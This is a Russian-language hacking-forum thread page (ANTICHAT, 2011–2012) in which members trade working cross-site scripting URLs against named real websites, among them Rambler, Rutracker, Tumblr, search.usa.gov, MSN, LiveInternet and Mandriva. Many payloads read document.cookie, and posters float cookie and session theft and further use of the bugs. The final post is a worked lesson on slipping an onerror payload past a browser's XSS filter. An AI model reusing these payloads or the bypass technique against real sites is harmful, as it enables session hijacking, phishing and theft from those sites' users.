HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #191  
Старый 28.11.2011, 15:01
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

http://horoscopes.rambler.ru/psychology.html?id=1174592&sec=1174580">alert('XSS')
 
Ответить с цитированием

  #192  
Старый 05.01.2012, 00:57
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию

Крупнейший русскоязычный битторрент трекер.

Код:
http://pm.rutracker.org/forum/privmsg.php?mode=post">alert(document.cookie)
 
Ответить с цитированием

  #193  
Старый 05.01.2012, 02:43
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию

Рамблер.

Код:
http://horoscopes.rambler.ru/names.html?rubric=0&words=test">alert('xss')
Код:
http://help.rambler.ru/1/search/avia/?set=help&query=111">alert('xss')
Код:
http://planeta.rambler.ru/abuse.html?url=">alert('xss')
 
Ответить с цитированием

  #194  
Старый 05.01.2012, 06:07
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

Цитата:
Сообщение от kravch_v  
Google XSS!
Цитата:
Сообщение от kravch_v  
Кибер, сессию и куки спереть реально.
Было бы интересно почитать, как это сделать. JS выполняется даже не на поддомене, а на googleusercontent.com. Кроме опен-редиректа и фишинга юзеров гугла не могу придумать варианты использования этого бага.
 
Ответить с цитированием

  #195  
Старый 08.01.2012, 13:03
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Tumblr - сервис микроблоггинга
тИЦ 3600 PR 8

Код HTML:
https://www.tumblr.com/register/join_tumblr?referring_blog=usagov%22%3E%3Cscript%3Ealert()%3C/script%3E
P.S. Достаточно известный сервис, можно юзнуть

--

USA Government


тИЦ 350 PR 10

Код:
http://search.usa.gov/search/news?affiliate=usa.govblog&locale=en&m=false&query=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&tbs=h
P.S. Тут есть ПП, поэтому может кому понадобится.
 
Ответить с цитированием

  #196  
Старый 19.01.2012, 05:54
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Ещё один msn.com


http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992"/>
 
Ответить с цитированием

  #197  
Старый 19.01.2012, 09:58
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

Цитата:
Сообщение от dev1k  
Ещё один msn.com

http://ringtones.nl.
msn.com
/games.php?rtch=1&rtlo=41992
"/>
Это не обычная пассивка, а DOM-based, поэтому защита от XSS в браузерах на нее не сработает.

Со страницы вызывается скрипт http://www.ringtonio.nl/javagames/?..., уязвимый к XSS в реферере.

Данные из реферера выводятся в двух местах:

Цитата:
Сообщение от None  
d.writeln('window.open (bd+"/send/javagame?id="+nr+"&clx=1&rths=0&brpc=&rtlo=
41992\"/>
","sendpop","toolbar=no,location=no,directories=no ,status=yes,menubar=no,scrollbars=yes,resizable=no ,copyhistory=no,width=600,height=450,screenX=0,scr eenY=0,top=0,left=0");');
Цитата:
Сообщение от None  
d.writeln('[/COLOR][/B]
">');
Видно, что кавычки экранируются. Но это происходит внутри строки в функции вывода, поэтому на странице экранирования не будет.

В примере используется второй вариант вывода - внутри тега input. Но зачем лишние символы?

http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992">[/COLOR]

Без них все работает нормально:

[B]http://ringtones.nl.msn.com/games.php?rtlo=">
 
Ответить с цитированием

  #198  
Старый 19.01.2012, 19:04
thrust
Познающий
Регистрация: 20.07.2011
Сообщений: 50
С нами: 7797206

Репутация: 31
По умолчанию

liveinternet.ru

Код:
http://www.liveinternet.ru/tests.php?cmd=show&session_id=7f00c824a22d703516ea5e7e94fc4a1b&order=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Код:
http://www.liveinternet.ru/search/?q=">alert(document.cookie)
 
Ответить с цитированием

  #199  
Старый 21.01.2012, 21:57
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

[CODE]
http://muziek.downloaden.nl.msn.com/artist.php?artist=2pac">alert(document.cookie)
 
Ответить с цитированием

  #200  
Старый 22.01.2012, 18:07
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ereee  
P.S. Xss с mandriva пашет только в Opera+IE.
Продолжаем знакомство с XSS.

Тема урока - "почему в одном браузере работает, а в другом нет"

[B]http://store.mandriva.com/simple_popup_image.php?img='>alert()alert(1[COLOR="Green"])= 8 тоже).

"alert()" вырезается фильтром и XSS не срабатывает. Чтобы это увидеть, можно в окне браузера нажать правую кнопку мыши и выбрать "Inspect element"

На странице код внедряется внутри тега img.

Цитата:
Сообщение от None  

У этого тега есть события onload и onerror, поэтому нет смысла его закрывать и использовать тег script. Достаточно вставить такой код:

Цитата:
Сообщение от None  

http://store.mandriva.com/simple_popup_image.php?img='+onerror=alert(1)+

Этот вариант работает в IE (до 8 версии), опере, фф, но все так же не работает в хроме. Фильтр вырезает "=alert(1)".

Попробуем сделать так:

http://store.mandriva.com/simple_popup_image.php?img='onerror=alert(1);/

Код "alert(1);/" содержит ошибку синтаксиса JS и не будет выполняться браузером, поэтому фильтровать его (казалось бы) необязательно. Но посмотрим внимательнее на ответ сервера:

Цитата:
Сообщение от None  

Так как после onerror= нет открывающей кавычки, весь код до закрытия тега будет считаться значением onerror. Браузер этот код видит так:

Цитата:
Сообщение от None  

"alert(1);/'/" уже не содержит ошибок синтаксиса и выполняется хромом в обход фильтра.

Окончательный вариант:

http://store.mandriva.com/simple_popup_image.php?img='onerror=alert(1);/

Не работает в IE >= 8
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...